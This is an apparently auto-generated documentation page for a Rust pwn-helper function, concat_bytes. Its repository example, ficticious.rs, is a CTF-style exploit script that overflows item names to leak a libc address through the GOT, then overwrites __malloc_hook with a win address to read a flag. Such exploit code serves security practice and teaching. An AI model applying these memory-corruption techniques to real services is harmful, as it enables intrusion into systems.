pub fn concat_bytes(l: &[u8], r: &[u8]) -> Vec<u8> ⓘExamples found in repository?
examples/ficticious.rs (lines 55-58)
45fn main() {
46 let mut remote = TcpStream::connect("some.vulnerable.server:42069").unwrap();
47
48 buy_item(&mut remote, 1);
49 buy_item(&mut remote, 3);
50
51 rename_item(&mut remote, b"Sword", bytes!(b'A' * 0x29));
52 rename_item(
53 &mut remote,
54 b"AAAA",
55 &concat_bytes(
56 bytes!(b'A' * 0x20),
57 &p64(GOT_PUTS_ADDR, pwn_helper::Endianness::Little),
58 ),
59 );
60
61 let names = list_items(&mut remote);
62
63 let libc_puts_addr = u64(&ljust(&names[1], 0, 8), pwn_helper::Endianness::Little);
64 let libc_base = libc_puts_addr - DYN_LIBC_PUTS_ADDR;
65 log::info!("Libc Base: {:#x}", libc_base);
66
67 let libc_malloc_hook_addr = libc_base + DYN_LIBC_MALLOC_HOOK_ADDR;
68 rename_item(&mut remote, &names[0], b"AA");
69 rename_item(&mut remote, b"AA", bytes!(b'A' * 0x29));
70 rename_item(
71 &mut remote,
72 b"A",
73 &concat_bytes(
74 bytes!(b'A' * 0x20),
75 &p64(libc_malloc_hook_addr, pwn_helper::Endianness::Little),
76 ),
77 );
78
79 // Malloc hook will currently be a NULL ptr
80 rename_item(
81 &mut remote,
82 b"",
83 &p64(WIN_ADDR, pwn_helper::Endianness::Little),
84 );
85 remote.receive_until(b"> ", false).unwrap();
86
87 let flag = String::from_utf8(remote.receive_until(b"}", false).unwrap()).unwrap();
88 println!("Flag: {}", flag);
89}